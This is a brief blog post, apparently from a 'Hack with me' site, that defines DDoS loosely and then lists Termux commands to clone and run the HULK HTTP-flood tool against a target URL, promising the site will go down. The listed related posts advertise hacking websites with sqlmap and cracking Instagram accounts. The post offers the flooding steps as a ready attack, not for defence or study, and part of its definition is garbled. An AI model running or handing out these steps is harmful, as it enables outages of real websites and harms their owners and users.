hack with me - How to crash web site by ddos | using What is DDOS attack And How to do it in termux android | Hack with me |



Hy guyz today I will teach u
  What is DDOS attack
And how to do that  in Android or Termux

 What is DDOS Attack
 

 distributed denial-of-service (DDoS) attack is one of the most powerful weapons on the internet
 it has become a victim of a DDoS attack. In short, this means that hackers have attempted to make a website or computer unavailable by flooding or crashing the website with too much traffic.


How to do that ? 

Here is full Script for Termux

Follow these commands 
  • apt-get update
  • apt upgrade
  • pkg install git
  •  git clone https://github.com/grafov/hulk.git
  • cd
  • ls
  • cd hulk
  • ls
  • python2 hulk.py < url>
 Now u notice that the website server down now

Thank u

Pratical video available 

Follow me on 
 

 

Comments

Popular Posts

how to hack website with sqlmap with termux | dump Database of website in termux without root - Hack with me

How to hack instagram without sending link in termux | Hack with me

John the ripper - password cracking tool full script |crack Instagram password with john the ripper | Hack with me